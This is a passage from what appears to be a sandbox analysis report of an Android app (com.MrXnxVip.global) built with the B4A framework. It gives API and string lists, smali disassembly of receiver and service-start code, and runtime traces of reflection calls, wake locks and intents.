                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Object.getClass
                        • java.lang.RuntimeException.<init>
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.httputils2service._receiver:Lanywheresoftware/b4a/objects/ReceiverHelper
                        • java.lang.Float.valueOf
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Boolean.valueOf
                        Strings
                        • com.MrXnxVip.global.httputils2service
                        • SHELL
                        • .main
                        • com.MrXnxVip.global.main
                        • initializeProcessGlobals
                        • CREATE
                        • *** Receiver (httputils2service) Receive
                        • (first time)
                        • ***
                        • *** Receiver (httputils2service) Receive ***
                        • *** Receiver (httputils2service) Receive (first time) ***
                        • receiver_receive
                        Position Instruction Meta Information
                        0sput-object p0, Lcom/MrXnxVip/global/httputils2service;->mostCurrent:Lcom/MrXnxVip/global/httputils2service;
                        2sget-object v0, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        3const/4 v1, 0x0
                        4const/4 v2, 0x0
                        5if-nez v0, :cond_60
                        6new-instance v0, Lanywheresoftware/b4a/BA;
                        7const/4 v5, 0x0
                        8const/4 v6, 0x0
                        10sget-object v7, Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType;->RECEIVER:Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType;
                        12const-string v8, "com.MrXnxVip.global.httputils2service"
                        13move-object v3, v0
                        14move-object v4, p1
                        16invoke-direct/range {v3 .. v8}, Lanywheresoftware/b4a/BA;-><init>(Landroid/content/Context;Lanywheresoftware/b4a/BALayout;Lanywheresoftware/b4a/BA;Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType;Ljava/lang/String;)V
                        17sput-object v0, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        19invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        20move-result p1
                        21if-eqz p1, :cond_29
                        23sget-object v3, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        24const/4 v4, 0x0
                        25const/4 v5, 0x1
                        26const/4 v7, 0x0
                        27new-array v8, v2, [Ljava/lang/Object;
                        29const-string v6, "SHELL"
                        31invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        32cond_29: new-instance p1, Ljava/lang/StringBuilder;
                        34invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        36sget-object v0, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        38invoke-virtual {v0}, Landroid/app/Application;->getPackageName()Ljava/lang/String;
                        39move-result-object v0
                        41invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        43const-string v0, ".main"
                        45invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        47invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        48move-result-object p1
                        50invoke-static {p1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 696851
                          • p0: com.MrXnxVip.global.main
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        51move-result-object p1
                        53const-string v0, "initializeProcessGlobals"
                        54new-array v3, v2, [Ljava/lang/Class;
                        56invoke-virtual {p1, v0, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 696858
                          • This:
                            • class com.MrXnxVip.global.main
                            • getName:com.MrXnxVip.global.main
                          • p0: 1
                          • p1: [Ljava.lang.Class;@4d3ca1a
                          • Return:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName: initializeProcessGlobals
                        57move-result-object p1
                        59invoke-virtual {p1, v1, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Reflective invoke: com.MrXnxVip.global.main.initializeProcessGlobals
                          • Return:
                            • null
                        • Time: 696866
                          • This:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName:initializeProcessGlobals
                          • p0: null
                          • p1: null
                          • Return:
                            • null
                        60try_end_4f:
                        61sget-object p1, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        63invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 696871
                          • This:
                            • com.MrXnxVip.global.httputils2service@ec19f28
                          • Return:
                            • class com.MrXnxVip.global.httputils2service
                            • getName: com.MrXnxVip.global.httputils2service
                        64move-result-object v0
                        66invoke-virtual {p1, v0}, Lanywheresoftware/b4a/BA;->loadHtSubs(Ljava/lang/Class;)V
                        67goto/16 :goto_60
                        68catch_59: move-exception p1
                        69new-instance p2, Ljava/lang/RuntimeException;
                        71invoke-direct {p2, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        72throw p2
                        73cond_60: new-instance p1, Lanywheresoftware/b4a/objects/ReceiverHelper;
                        75invoke-direct {p1, p0}, Lanywheresoftware/b4a/objects/ReceiverHelper;-><init>(Landroid/content/BroadcastReceiver;)V
                        76iput-object p1, p0, Lcom/MrXnxVip/global/httputils2service;->_receiver:Lanywheresoftware/b4a/objects/ReceiverHelper;
                        78sget-object p1, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        80invoke-static {p1}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        81move-result p1
                        82const/4 v0, 0x2
                        83const/4 v3, 0x1
                        84if-eqz p1, :cond_91
                        86sget-object v4, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        87const/4 v5, 0x0
                        88const/4 v6, 0x1
                        89const/4 v8, 0x1
                        90const/4 p1, 0x4
                        91new-array v9, p1, [Ljava/lang/Object;
                        93const-string p1, "com.MrXnxVip.global.httputils2service"
                        94aput-object p1, v9, v2
                        95aput-object v4, v9, v3
                        97iget-object p1, p0, Lcom/MrXnxVip/global/httputils2service;->_receiver:Lanywheresoftware/b4a/objects/ReceiverHelper;
                        98aput-object p1, v9, v0
                        99const/4 p1, 0x3
                        100sget v7, Lanywheresoftware/b4a/keywords/Common;->Density:F
                        102invoke-static {v7}, Ljava/lang/Float;->valueOf(F)Ljava/lang/Float;
                        103move-result-object v7
                        104aput-object v7, v9, p1
                        106const-string v7, "CREATE"
                        108invoke-virtual/range {v4 .. v9}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        109cond_91:
                        110sget-object p1, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        112invoke-virtual {p1, v2}, Lanywheresoftware/b4a/BA;->setActivityPaused(Z)V
                        113new-instance p1, Ljava/lang/StringBuilder;
                        115invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        117const-string v4, "*** Receiver (httputils2service) Receive "
                        119invoke-virtual {p1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        120sget-boolean v4, Lcom/MrXnxVip/global/httputils2service;->firstTime:Z
                        121if-eqz v4, :cond_a7
                        123const-string v4, "(first time)"
                        124goto/16 :goto_a9
                        125cond_a7:
                        126const-string v4, ""
                        127goto_a9:
                        128invoke-virtual {p1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        130const-string v4, " ***"
                        132invoke-virtual {p1, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        134invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        135move-result-object p1
                        137invoke-static {p1}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 696946
                          • p0: *** Receiver (httputils2service) Receive (first time) ***
                        • Time: 697946
                          • p0: *** Receiver (httputils2service) Receive ***
                        138new-instance p1, Lanywheresoftware/b4a/objects/IntentWrapper;
                        140invoke-direct {p1}, Lanywheresoftware/b4a/objects/IntentWrapper;-><init>()V
                        142invoke-virtual {p1, p2}, Lanywheresoftware/b4a/objects/IntentWrapper;->setObject(Ljava/lang/Object;)V
                        144sget-object p2, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        145new-array v0, v0, [Ljava/lang/Object;
                        146sget-boolean v4, Lcom/MrXnxVip/global/httputils2service;->firstTime:Z
                        148invoke-static {v4}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        149move-result-object v4
                        150aput-object v4, v0, v2
                        151aput-object p1, v0, v3
                        153const-string p1, "receiver_receive"
                        155invoke-virtual {p2, v1, p1, v0}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        156sput-boolean v2, Lcom/MrXnxVip/global/httputils2service;->firstTime:Z
                        157return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        • android.content.Context.getResources
                        • android.content.res.Resources.getDisplayMetrics
                        • java.lang.Class.forName
                        • java.lang.Class.getField
                        • java.lang.Float.valueOf
                        • java.lang.reflect.Field.set
                        • java.lang.RuntimeException.<init>
                        • android.app.Activity.getApplication
                        • anywheresoftware.b4a.BA$SharedProcessBA$ModuleType.SERVICE:Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType
                        • android.app.Service.getApplication
                        • anywheresoftware.b4a.BA$SharedProcessBA$ModuleType.RECEIVER:Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType
                        • android.content.Context.getApplicationContext
                        • android.content.Context.getApplicationContext
                        • android.content.Context.getPackageName
                        • java.lang.Class.forName
                        • java.lang.Class.getMethod
                        • java.lang.Class.newInstance
                        • java.lang.reflect.Method.invoke
                        • java.lang.Exception.printStackTrace
                        • java.lang.System.out:Ljava/io/PrintStream
                        • java.io.PrintStream.println
                        • java.lang.String.endsWith
                        • java.util.HashMap.<init>
                        Strings
                        • anywheresoftware.b4a.keywords.Common
                        • Density
                        • application context not set.
                        • com.MrXnxVip.global
                        • anywheresoftware.b4a.remotelogger.RemoteLogger
                        • Start
                        • Bridge logger not enabled.
                        • .starter
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2const/4 v0, 0x0
                        3if-eqz p1, :cond_2f
                        5invoke-virtual {p1}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
                        6move-result-object v1
                        8invoke-virtual {v1}, Landroid/content/res/Resources;->getDisplayMetrics()Landroid/util/DisplayMetrics;
                        9move-result-object v1
                        10iget v1, v1, Landroid/util/DisplayMetrics;->density:F
                        11sput v1, Lanywheresoftware/b4a/BA;->density:F
                        12try_start_12:
                        13const-string v1, "anywheresoftware.b4a.keywords.Common"
                        15invoke-static {v1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 685640
                          • p0: anywheresoftware.b4a.keywords.Common
                          • Return:
                            • class anywheresoftware.b4a.keywords.Common
                            • getName: anywheresoftware.b4a.keywords.Common
                        16move-result-object v1
                        18const-string v2, "Density"
                        20invoke-virtual {v1, v2}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        21move-result-object v1
                        22sget v2, Lanywheresoftware/b4a/BA;->density:F
                        24invoke-static {v2}, Ljava/lang/Float;->valueOf(F)Ljava/lang/Float;
                        25move-result-object v2
                        27invoke-virtual {v1, v0, v2}, Ljava/lang/reflect/Field;->set(Ljava/lang/Object;Ljava/lang/Object;)V
                        • Time: 685641
                          • This:
                            • public static float anywheresoftware.b4a.keywords.Common.Density
                            • getName:Density
                          • p0: null
                          • p1: 1.3312501
                        28try_end_27: goto/16 :goto_2f
                        29catch_28: move-exception p1
                        30new-instance p2, Ljava/lang/RuntimeException;
                        32invoke-direct {p2, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        33throw p2
                        34cond_2f: if-eqz p1, :cond_3f
                        35instance-of v1, p1, Landroid/app/Activity;
                        36if-eqz v1, :cond_3f
                        37move-object v1, p1
                        38check-cast v1, Landroid/app/Activity;
                        40invoke-virtual {v1}, Landroid/app/Activity;->getApplication()Landroid/app/Application;
                        41move-result-object v2
                        42sput-object v2, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        43goto/16 :goto_40
                        44cond_3f: move-object v1, v0
                        45goto_40:
                        46sget-object v2, Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType;->SERVICE:Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType;
                        47if-ne p4, v2, :cond_4e
                        48move-object v2, p1
                        49check-cast v2, Landroid/app/Service;
                        51invoke-virtual {v2}, Landroid/app/Service;->getApplication()Landroid/app/Application;
                        52move-result-object v2
                        53sput-object v2, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        54goto/16 :goto_6c
                        55cond_4e:
                        56sget-object v2, Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType;->RECEIVER:Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType;
                        57if-ne p4, v2, :cond_6c
                        59sget-object v2, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        60if-nez v2, :cond_6c
                        62invoke-virtual {p1}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
                        63move-result-object v2
                        64instance-of v2, v2, Landroid/app/Application;
                        65if-eqz v2, :cond_67
                        67invoke-virtual {p1}, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
                        68move-result-object v2
                        69check-cast v2, Landroid/app/Application;
                        70sput-object v2, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        71goto/16 :goto_6c
                        72cond_67:
                        73const-string v2, "application context not set."
                        75invoke-static {v2}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        76goto_6c: if-eqz p1, :cond_9d
                        78sget-object v2, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        79if-nez v2, :cond_9d
                        81invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        • Time: 685643
                          • This:
                            • android.app.Application@feb8753
                          • Return:
                            • com.MrXnxVip.global
                        82move-result-object v2
                        83sput-object v2, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        84try_start_78:
                        85const-string v2, "anywheresoftware.b4a.remotelogger.RemoteLogger"
                        87invoke-static {v2}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 685648
                          • p0: anywheresoftware.b4a.remotelogger.RemoteLogger
                          • Return:
                            • class anywheresoftware.b4a.remotelogger.RemoteLogger
                            • getName: anywheresoftware.b4a.remotelogger.RemoteLogger
                        88move-result-object v2
                        90const-string v3, "Start"
                        91const/4 v4, 0x0
                        92new-array v5, v4, [Ljava/lang/Class;
                        94invoke-virtual {v2, v3, v5}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 685649
                          • This:
                            • class anywheresoftware.b4a.remotelogger.RemoteLogger
                            • getName:anywheresoftware.b4a.remotelogger.RemoteLogger
                          • p0: Start
                          • p1: [Ljava.lang.Class;@a9d6a4f
                          • Return:
                            • public void anywheresoftware.b4a.remotelogger.RemoteLogger.Start()
                            • getName: Start
                        95move-result-object v3
                        97invoke-virtual {v2}, Ljava/lang/Class;->newInstance()Ljava/lang/Object;
                        98move-result-object v2
                        99new-array v4, v4, [Ljava/lang/Object;
                        101invoke-virtual {v3, v2, v4}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 685654
                          • This:
                            • public void anywheresoftware.b4a.remotelogger.RemoteLogger.Start()
                            • getName:Start
                          • p0: anywheresoftware.b4a.remotelogger.RemoteLogger@bc223c8
                          • p1: [Ljava.lang.Object;@d405c61
                          • Return:
                            • null
                        • Reflective invoke: anywheresoftware.b4a.remotelogger.RemoteLogger.Start
                          • This:
                            • anywheresoftware.b4a.remotelogger.RemoteLogger@f27168f
                          • Return:
                            • null
                        • Time: 824286
                          • This:
                            • public void anywheresoftware.b4a.remotelogger.RemoteLogger.Start()
                            • getName:Start
                          • p0: anywheresoftware.b4a.remotelogger.RemoteLogger@f27168f
                          • p1: [Ljava.lang.Object;@e1e5d1c
                          • Return:
                            • null
                        102try_end_90: goto/16 :goto_9d
                        103catch_91: move-exception v2
                        105invoke-virtual {v2}, Ljava/lang/Exception;->printStackTrace()V
                        106goto/16 :goto_9d
                        107catch_96:
                        108sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;
                        110const-string v3, "Bridge logger not enabled."
                        112invoke-virtual {v2, v3}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
                        113cond_9d: iput-object v0, p0, Lanywheresoftware/b4a/BA;->eventsTarget:Ljava/lang/Object;
                        115const-string v2, ".starter"
                        117invoke-virtual {p5, v2}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z
                        118move-result v2
                        119if-eqz v2, :cond_ac
                        121sget-object p1, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        122iput-object p1, p0, Lanywheresoftware/b4a/BA;->context:Landroid/content/Context;
                        123goto/16 :goto_ae
                        124cond_ac: iput-object p1, p0, Lanywheresoftware/b4a/BA;->context:Landroid/content/Context;
                        125goto_ae: iput-object v1, p0, Lanywheresoftware/b4a/BA;->activity:Landroid/app/Activity;
                        126new-instance p1, Ljava/util/HashMap;
                        128invoke-direct {p1}, Ljava/util/HashMap;-><init>()V
                        129iput-object p1, p0, Lanywheresoftware/b4a/BA;->htSubs:Ljava/util/HashMap;
                        130iput-object p5, p0, Lanywheresoftware/b4a/BA;->className:Ljava/lang/String;
                        131iput-object p3, p0, Lanywheresoftware/b4a/BA;->processBA:Lanywheresoftware/b4a/BA;
                        132iput-object p2, p0, Lanywheresoftware/b4a/BA;->vg:Lanywheresoftware/b4a/BALayout;
                        133if-nez p3, :cond_c7
                        134new-instance p1, Lanywheresoftware/b4a/BA$SharedProcessBA;
                        136invoke-direct {p1, p4}, Lanywheresoftware/b4a/BA$SharedProcessBA;-><init>(Lanywheresoftware/b4a/BA$SharedProcessBA$ModuleType;)V
                        137iput-object p1, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        138goto/16 :goto_c9
                        139cond_c7: iput-object v0, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        140goto_c9: return-void
                        Cross References
                        APIs
                        • java.lang.Class.getName
                        • java.lang.String.equals
                        • android.content.Context.getPackageManager
                        • android.content.pm.PackageManager.checkPermission
                        • android.content.Context.getSystemService
                        • android.content.Intent.getComponent
                        • java.lang.String.valueOf
                        • android.os.PowerManager.newWakeLock
                        • android.os.PowerManager$WakeLock.setReferenceCounted
                        • android.os.PowerManager$WakeLock.acquire
                        • java.lang.Integer.valueOf
                        • java.util.HashMap.put
                        • android.content.Intent.putExtra
                        • android.content.Intent.putExtra
                        • android.content.Context.startForegroundService
                        • android.content.Context.startService
                        • android.content.Intent.putExtra
                        • android.content.Context.startForegroundService
                        • java.lang.RuntimeException.<init>
                        Strings
                        • The Starter service should never be started from a receiver.
                        • anywheresoftware.b4a.ShellBA
                        • Cannot start from a receiver in debug mode.
                        • com.MrXnxVip.global.main
                        • android.permission.WAKE_LOCK
                        • power
                        • b4a_wakelock
                        • b4a_foreground
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Landroid/content/Context;",
                        4"Landroid/content/Intent;",
                        5"Z",
                        6"Ljava/lang/Class<",
                        7"*>;)V"
                        8}
                        9.end annotation
                        10if-eqz p2, :cond_7
                        12const-string p2, "The Starter service should never be started from a receiver."
                        14invoke-static {p2}, Lanywheresoftware/b4a/BA;->LogError(Ljava/lang/String;)V
                        • Time: 811959
                          • p0: The Starter service should never be started from a receiver.
                        15cond_7:
                        16invoke-virtual {p3}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        17move-result-object p2
                        19const-string p3, "anywheresoftware.b4a.ShellBA"
                        21invoke-virtual {p2, p3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        22move-result p2
                        23if-eqz p2, :cond_1d
                        25sget-object p2, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        26if-nez p2, :cond_1d
                        28const-string p0, "Cannot start from a receiver in debug mode."
                        30invoke-static {p0}, Lanywheresoftware/b4a/BA;->LogError(Ljava/lang/String;)V
                        31return-void
                        32cond_1d:
                        33invoke-static {}, Lanywheresoftware/b4a/BA;->isAnyActivityVisible()Z
                        • Time: 696111
                          • p0: com.MrXnxVip.global.main
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        • Reflective invoke: com.MrXnxVip.global.main.isAnyActivityVisible
                          • Return:
                            • true
                        • Time: 696120
                          • This:
                            • public static boolean com.MrXnxVip.global.main.isAnyActivityVisible()
                            • getName:isAnyActivityVisible
                          • p0: null
                          • p1: null
                          • Return:
                            • true
                        • Time: 702720
                          • This:
                            • public static boolean com.MrXnxVip.global.main.isAnyActivityVisible()
                            • getName:isAnyActivityVisible
                          • p0: null
                          • p1: null
                          • Return:
                            • false
                        • Reflective invoke: com.MrXnxVip.global.main.isAnyActivityVisible
                          • Return:
                            • false
                        34move-result p2
                        35const/4 p3, 0x1
                        36if-nez p2, :cond_67
                        38invoke-virtual {p0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
                        39move-result-object v0
                        41sget-object v1, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        43const-string v2, "android.permission.WAKE_LOCK"
                        45invoke-virtual {v0, v2, v1}, Landroid/content/pm/PackageManager;->checkPermission(Ljava/lang/String;Ljava/lang/String;)I
                        46move-result v0
                        47if-nez v0, :cond_67
                        48sget v0, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->wakeLockId:I
                        49add-int/2addr v0, p3
                        50sput v0, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->wakeLockId:I
                        52const-string v0, "power"
                        54invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        • Time: 702723
                          • This:
                            • android.app.ReceiverRestrictedContext@2893b75
                          • p0: android-installer
                          • Return:
                            • android.os.PowerManager@3993273
                        • Time: 824817
                          • This:
                            • android.app.ReceiverRestrictedContext@2513810
                          • p0: power
                          • Return:
                            • android.os.PowerManager@765cb9a
                        55move-result-object v0
                        56check-cast v0, Landroid/os/PowerManager;
                        58invoke-virtual {p1}, Landroid/content/Intent;->getComponent()Landroid/content/ComponentName;
                        59move-result-object v1
                        61invoke-static {v1}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        62move-result-object v1
                        64invoke-virtual {v0, p3, v1}, Landroid/os/PowerManager;->newWakeLock(ILjava/lang/String;)Landroid/os/PowerManager$WakeLock;
                        65move-result-object v0
                        66const/4 v1, 0x0
                        68invoke-virtual {v0, v1}, Landroid/os/PowerManager$WakeLock;->setReferenceCounted(Z)V
                        69const-wide/32 v1, 0xea60
                        71invoke-virtual {v0, v1, v2}, Landroid/os/PowerManager$WakeLock;->acquire(J)V
                        73sget-object v1, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->wakeLocks:Ljava/util/HashMap;
                        74sget v2, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->wakeLockId:I
                        76invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        77move-result-object v2
                        79invoke-virtual {v1, v2, v0}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        80sget v0, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->wakeLockId:I
                        82const-string v1, "b4a_wakelock"
                        84invoke-virtual {p1, v1, v0}, Landroid/content/Intent;->putExtra(Ljava/lang/String;I)Landroid/content/Intent;
                        • Time: 702724
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 1
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 709917
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 2
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 716083
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 3
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 723371
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 4
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 729681
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 5
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 735912
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 6
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 763273
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 7
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 774322
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 8
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 780432
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 9
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 786834
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 10
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 792904
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 11
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 798947
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 12
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 804979
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 13
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 811006
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 14
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 811974
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.starter (has extras) }
                          • p0: b4a_wakelock
                          • p1: 15
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.starter (has extras) }
                        • Time: 811990
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 16
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                        • Time: 812006
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.newmessage1 (has extras) }
                          • p0: b4a_wakelock
                          • p1: 17
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.newmessage1 (has extras) }
                        • Time: 812020
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.pnservices (has extras) }
                          • p0: b4a_wakelock
                          • p1: 18
                          • Return:
                            • Intent { cmp=com.MrXnxVip.global/.pnservices (has extras) }
                        • Time: 818452
                          • This:
                            • Intent { cmp=com.MrXnxVip.global/.firebasemessaging (has extras) }
                          • p0: b4a_wakelock
                          • p1: 19
                          • Return:
